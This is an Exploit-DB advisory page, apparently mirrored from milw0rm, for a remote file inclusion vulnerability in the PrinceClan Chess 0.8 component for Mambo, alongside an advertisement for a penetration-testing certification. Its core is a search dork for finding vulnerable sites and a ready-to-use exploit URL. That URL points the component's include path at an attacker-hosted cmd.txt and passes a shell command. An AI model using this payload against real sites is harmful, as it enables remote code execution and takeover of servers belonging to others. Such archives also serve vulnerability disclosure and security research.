Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion

EDB-ID:

2069


Author:

OLiBekaS

Type:

webapps


Platform:

PHP

Date:

2006-07-24


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

# pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls 

# milw0rm.com [2006-07-24]